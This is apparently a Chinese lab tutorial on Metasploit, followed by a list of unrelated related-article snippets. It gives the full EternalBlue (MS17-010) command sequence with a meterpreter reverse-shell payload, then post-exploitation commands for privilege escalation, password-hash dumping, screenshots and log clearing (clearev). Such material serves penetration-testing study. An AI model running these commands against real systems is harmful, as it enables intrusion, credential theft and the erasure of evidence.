3、MSF使用
文章目录
- 一、利用ms17-010漏洞对靶机执行溢出攻击
- 二、后渗透模块meterpreter的使用
一、利用ms17-010漏洞对靶机执行溢出攻击
分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:
use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue模块
set RHOST [靶机IP] //设置远程主机(靶机)的IP地址
set LHOST [操作机IP] //设置本地主机(操作机)的IP地址
set payload windows/x64/meterpreter/reverse_tcp //使用payload:meterpreter/reverse_tcp
set RPORT 445 //设置目标端口
set target 0 //设置目标操作系统类型(此处为自动识别类型)
run //执行

溢出攻击成功后,返回meterpreter提示符:

常规情况下用
exp攻破了系统,需要与靶机进行通信,以便操纵靶机,一般用反弹shell,这个反弹shell的代码就是payload。
二、后渗透模块meterpreter的使用
pwd //打印当前工作目录
sysinfo // 查看系统信息
getuid //获取当前权限的用户id
ps //查看当前目标机上运行的进程列表和pid
getsystem //获取system权限
screenshot //截取目标主机当前屏幕
hashdump //获取用户名与hash口令
shell //获取目标主机shell
upload //上传一个文件
download //下载一个文件
execute //执行目标系统中的文件(-f指定文件,-i执行可交互模式,-H隐藏窗口)
clearev //清除日志
background //将meterpreter放入后台(使用sessions -i重新连接到会话)

相关文章:
3、MSF使用
文章目录 一、利用ms17-010漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用 一、利用ms17-010漏洞对靶机执行溢出攻击 分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用: use exploit/windows/smb/ms17_010_eter…...
34970A 数据采集 / 数据记录仪开关单元
34970A 数据采集 / 数据记录仪开关单元 产品综述: Keysight 34970A 数据采集/数据记录仪开关单元由一个 3 插槽主机和一个内置的 6 1/2 位数字万用表组成。每个通道可以单独配置,以测量 11 种不同功能之一,这样既不会增加成本,也…...
BUUCTF刷题之路-web-[GXYCTF2019]Ping Ping Ping1
启动环境后,是一个简简单单的页面: 看样子是能够触发远程执行漏洞的。尝试下ping 127.0.0.1,如果有回显说明我们的想法是对的。 最近才学习的nc反弹shell。想着是否能用nc反弹shell的办法。控制服务器然后输出flag呢?于是我测试下…...
一、深入简出串口(USRT)通信——基本概念。
一、前言 串口到底是什么?简单来说一句话就可以解释,串口就是一种通信协议。 看到这里可能大家会觉得你这不是放屁么,说了跟没说一样。所以这里做前言来描述,大家要先对通信协议有一个下意识地认识才能在学习串口的时候不至于迷茫…...
采用connector-c++ 8.0操作数据库
1.下载最新的Connector https://dev.mysql.com/downloads/connector/cpp/,下载带debug的库。 解压缩到本地,本次使用的是带debug模式的connector库: 注:其中mysqlcppconn与mysqlcppconn8的区别是: 2.在cmakelist…...
【Java数据结构 -- 时间和空间复杂度】
时间和空间复杂度 1. 算法效率2. 时间复杂度2.1 时间复杂度的概念2.2 大O的渐进表示法2.3 推导大O阶方法2.4 常见时间复杂度计算举例例1例2例3例4 计算 bubbleSort的时间复杂度例5 计算binarySearch的时间复杂度?例6 计算阶乘递归factorial的时间复杂度?…...
【每日一题】1457. 二叉树中的伪回文路径-2023.11.25
题目: 1457. 二叉树中的伪回文路径 给你一棵二叉树,每个节点的值为 1 到 9 。我们称二叉树中的一条路径是 「伪回文」的,当它满足:路径经过的所有节点值的排列中,存在一个回文序列。 请你返回从根到叶子节点的所有路…...
能让PDF看起来像是扫描件的Look Scanned
什么是 Look Scanned ? Look Scanned 是一个能够让 PDF 看起来就像是扫描件一样的纯前端网站。你再也不需要麻烦地打印之后扫描了,你所需要的就是鼠标点几下。 这是个挺有意思的软件,但是老苏不确定什么场景下会用到这个软件,如果不想自己搭…...
RT-DETR 更换损失函数之 SIoU / EIoU / WIoU / Focal_xIoU
文章目录 更换方式CIoUDIoUEIoUGIoUSIoUWIoUFocal_CIoUFocal_DIoUFocal_EIoUFocal_GIoUFocal_SIoU提示更换方式 第一步:将ultralytics/ultralytics/utils/metrics.py文件中的bbox_iou替换为如下的代码:class...
代码随想录算法训练营第四十六天 | 139.单词拆分,多重背包,背包问题总结
目录 139.单词拆分 多重背包 背包问题总结 01背包 完全背包 多重背包 139.单词拆分 题目链接:139. 单词拆分 不要求字典中的单词全部使用,但是要求拆分的单词拆分成的每一个子串都是字典中的单词。 (1)dp[ i ] 表示前 i 个字符组成…...
opencv-Canny 边缘检测
Canny边缘检测是一种经典的图像边缘检测算法,它在图像中找到强度梯度的变化,从而识别出图像中的边缘。Canny边缘检测的优点包括高灵敏度和低误检率。 在OpenCV中,cv2.Canny() 函数用于执行Canny边缘检测。 基本语法如下: edges…...
案例023:基于微信小程序的童装商城的设计与实现
文末获取源码 开发语言:Java 框架:SSM JDK版本:JDK1.8 数据库:mysql 5.7 开发软件:eclipse/myeclipse/idea Maven包:Maven3.5.4 小程序框架:uniapp 小程序开发软件:HBuilder X 小程序…...
Ansible的循环:loop,with_<lookup>和until
环境 管理节点:Ubuntu 22.04控制节点:CentOS 8Ansible:2.15.6 循环的方法 loopwith_<lookup>until 用这几种方式都可以实现循环。其中, loop 是推荐的用法,在很多时候能够替换 with_<lookup> 。 loop…...
点云 surface 方法总结
点云的表面方法是指通过点云数据来估计和重建物体或场景的表面几何形状。下面总结了几种常见的点云表面方法: 三角化:三角化是最常用的点云表面重建方法之一。它将点云中的点连接成三角形网格,从而重建出物体或场景的表面。常见的三角化算法…...
深入探索Linux文件系统:属性、路径与隐藏之谜
🎥 屿小夏 : 个人主页 🔥个人专栏 : Linux系统理论 🌄 莫道桑榆晚,为霞尚满天! 文章目录 📑前言🌤️文件的组成☁️文件属性☁️文件内容☁️注意事项 🌤️路…...
梯度详解与优化实战
什么是梯度 对所有自变量求偏微分构成的向量,它是一个向量(有大小和函数值增长方向) 导数是一个标量 找最小值点坐标的案例 import torchimport numpy as np import matplotlib.pyplot as plt def himmelblau(x):return (x[0]**2x[1]-11)…...
OSG编程指南<十二>:OSG二三维文字创建及文字特效
1、字体基础知识 适当的文字信息对于显示场景信息是非常重要的。在 OSG 中,osgText提供了向场景中添加文字的强大功能,由于有第三方插件 FreeType 的支持,它完全支持TrueType 字体。很多人可能对 FreeType 和 TrueType 还不太了解,…...
visionOS空间计算实战开发教程Day 6 拖拽和点击
在之前的学习中我们在空间中添加了3D模型,但在初始摆放后就无法再对其进行移动或做出修改。本节我们在Day 5显示和隐藏的基础上让我们模型可以实现拖拽效果,同时对纯色的立方体实现点击随机换色的功能。 首先是入口文件,无需做出改变…...
C# APS.NET CORE 6.0 WEB API IIS部署
1.创建 APS.NET CORE6.0 WEB API项目 默认选项即可 源代码: 项目文件展开: launchSettings.json {"$schema": "https://json.schemastore.org/launchsettings.json","iisSettings": {"windowsAuthentication"…...
C/C++ 常用加密与解密算法
计算机安全和数据隐私是现代应用程序设计中至关重要的方面。为了确保数据的机密性和完整性,常常需要使用加密和解密算法。C是一种广泛使用的编程语言,提供了许多加密和解密算法的实现。本文将介绍一些在C中常用的加密与解密算法,这其中包括Xo…...
华硕A豆14 I421E 原厂Win10 20H2系统 分享下载
华硕A豆14 I421E笔记本自带一键恢复功能,即使系统出现异常或用户自行重装/更换硬盘后导致恢复功能失效,也能通过原厂提供的工厂文件轻松恢复至出厂设置。支持的型号包括I421EA, I421EQ, I421EAY和I421EQY。预装的是Windows 10 20H2家庭版系统,…...
仿真环境滞后=Agent上线延迟3个月?紧急发布AIAgent仿真基建加速包:含5个预训练世界模型接口+2套轻量级物理引擎适配器
第一章:仿真环境滞后对AIAgent上线周期的架构级影响 2026奇点智能技术大会(https://ml-summit.org) 当仿真环境无法同步真实生产系统的拓扑结构、时序约束与异常注入能力时,AIAgent 的架构验证便陷入“高保真失配”陷阱——训练阶段表现优异的策略在部…...
物业费不用愁了?这家公司让“日常消费”变成“物业费”,模式正在全国复制!
你有没有为每月固定的物业费头疼过?觉得这笔钱交得有点“冤”?物业公司也为收费难发愁,服务再好也难免有业主拖欠。现在,一种全新的智慧社区模式正在悄然改变这一局面——“消费返物业费”。一、一个点子,解决三方难题…...
病理切片AI分析实战:手把手教你用CLAM处理WSI数据(附避坑指南)
病理切片AI分析实战:CLAM框架下的WSI智能诊断全流程解析 当一张病理切片在显微镜下被数字化为超过10万像素的全切片图像(WSI)时,传统的人工分析方式正面临前所未有的效率瓶颈。我们曾见证某三甲医院病理科主任在连续工作8小时后&a…...
Z-Image-Turbo-rinaiqiao-huiyewunv多场景落地:AI绘画教育课程实验平台搭建实践
Z-Image-Turbo-rinaiqiao-huiyewunv多场景落地:AI绘画教育课程实验平台搭建实践 1. 项目背景与核心价值 在教育数字化转型的浪潮中,AI绘画技术正成为艺术教育创新的重要驱动力。Z-Image Turbo (辉夜大小姐-日奈娇)作为一款专为二次元人物绘图优化的工具…...
从SRADSGAN看遥感图像大倍数超分辨率的挑战与突破
1. 遥感图像超分辨率的现实困境 第一次接触遥感图像超分辨率任务时,我对着x8放大的卫星图像直挠头——那些模糊成色块的建筑物轮廓,就像被打了马赛克的老照片。这其实是行业内的普遍痛点:当放大倍数超过x4时,传统超分方法生成的图…...
零基础转行大模型选哪个岗位方向最易上手?常见问题全解析
零基础转行大模型选哪个岗位方向最易上手?常见问题全解析 标签:#人工智能、#深度学习、#自然语言处理、#神经网络、#机器学习、#计算机视觉、#ai ### 先打破一个误区:大模型≠只有算法岗,普通人也能进### 大模型岗位:哪…...
Apache Lucene-Solr终极指南:为什么它是企业级搜索的首选解决方案
Apache Lucene-Solr终极指南:为什么它是企业级搜索的首选解决方案 【免费下载链接】lucene-solr Apache Lucene and Solr open-source search software 项目地址: https://gitcode.com/gh_mirrors/lu/lucene-solr Apache Lucene和Solr作为Apache软件基金会的…...
千问3.5写小说app2025推荐,助力高效创作体验
千问3.5写小说app2025推荐,助力高效创作体验在当今数字化时代,写小说的方式发生了巨大的变革,越来越多的创作者借助写小说APP来提升创作效率和质量。据《2025中国网络文学创作工具发展报告》显示,2025年使用写小说APP进行创作的作…...
EdgeConv揭秘:动态图卷积网络在点云处理中的革新应用
1. 从PointNet到DGCNN:点云处理的进化之路 第一次接触点云数据时,我被它的不规则性难住了——这些漂浮在三维空间中的散点,既不像图像有规整的像素网格,也不像文本有明确的序列关系。传统方法需要先将点云转换为体素网格ÿ…...
